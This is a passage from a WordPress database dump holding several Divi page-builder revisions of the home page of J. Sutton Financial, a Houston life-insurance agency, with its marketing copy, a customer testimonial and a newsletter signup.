_builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-19 03:04:25','2023-03-19 03:04:25','',138,'http://cmdev-site1.com/?p=374',0,'revision','',0),(371,1,'2023-03-19 03:03:15','2023-03-19 03:03:15','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" custom_padding=\"24px||231px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<p>Planning for a <em>better </em>financial future</p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto||auto||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] -->Form Goes Here<!-- [et_pb_line_break_holder] --></p>[/et_pb_code][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>We have your back. And american income life has ours. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><strong>Just because something is essential, doesn’t mean it has to cost more than a cup of coffee</strong></p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Your policy could start at just .67¢ a day.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_blog _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>Share your email with us and every few weeks we\'ll send some life wisdom your way.</p>[/et_pb_text][et_pb_signup button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_blog posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" admin_label=\"Row\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-19 03:03:15','2023-03-19 03:03:15','',138,'http://cmdev-site1.com/?p=371',0,'revision','',0),(378,1,'2023-03-19 03:08:03','2023-03-19 03:08:03','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_padding=\"24px||231px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<p>Planning for a <em>better </em>financial future</p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto||auto||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] -->Form Goes Here<!-- [et_pb_line_break_holder] --></p>[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>We have your back. And american income life has ours. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>We have your back. And american income life has ours. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><strong>Just because something is essential, doesn’t mean it has to cost more than a cup of coffee</strong></p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Your policy could start at just .67¢ a day.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Share your email with us and every few weeks we\'ll send some life wisdom your way.</p>[/et_pb_text][et_pb_signup button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-19 03:08:03','2023-03-19 03:08:03','',138,'http://cmdev-site1.com/?p=378',0,'revision','',0),(376,1,'2023-03-19 03:07:22','2023-03-19 03:07:22','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" custom_padding=\"23px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" title_text=\"child playing superhero\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"24px||231px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" background_enable_image=\"off\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<p>Planning for a <em>better </em>financial future</p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto||auto||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] -->Form Goes Here<!-- [et_pb_line_break_holder] --></p>[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>We have your back. And american income life has ours. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" admin_label=\"Row\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>We have your back. And american income life has ours. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><strong>Just because something is essential, doesn’t mean it has to cost more than a cup of coffee</strong></p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Your policy could start at just .67¢ a day.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" title_text=\"Cell phone subscribe photo New Green b3d04e and new blue 3e5ac0\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" background_enable_image=\"off\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Share your email with us and every few weeks we\'ll send some life wisdom your way.</p>[/et_pb_text][et_pb_signup button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-19 03:07:22','2023-03-19 03:07:22','',138,'http://cmdev-site1.com/?p=376',0,'revision','',0),(381,1,'2023-03-19 03:28:01','2023-03-19 03:28:01','[et_pb_section fb_built=\"1\" fullwidth=\"on\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"City of Houston Skyline July 4th 2018 with dramatic sunset\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/02/J-Sutton-Financial-Houston-Skyline-w-white-logo-edited-2-28-2023.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"||376px|||\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_padding=\"24px||146px|||\" global_colors_info=\"{}\" custom_margin=\"|auto|-52px|auto||\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||27px||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" header_font_size=\"54px\" sticky_enabled=\"0\" header_text_color=\"#FFFFFF\"]<h2><span style=\"color: #ffffff;\">Planning for a <em>better </em>financial future</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<h3><span style=\"color: #000000;\">We\'re unlike other life insurance experiences you\'ve had.</span></h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"color: rgba(0, 0, 0, 0.85);\">J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" global_colors_info=\"{}\" custom_padding=\"||0px|||\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<p><!-- [et_pb_line_break_holder] --> This is a placeholder for the coming form.  <!-- [et_pb_line_break_holder] --></p><!-- [et_pb_line_break_holder] -->[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" 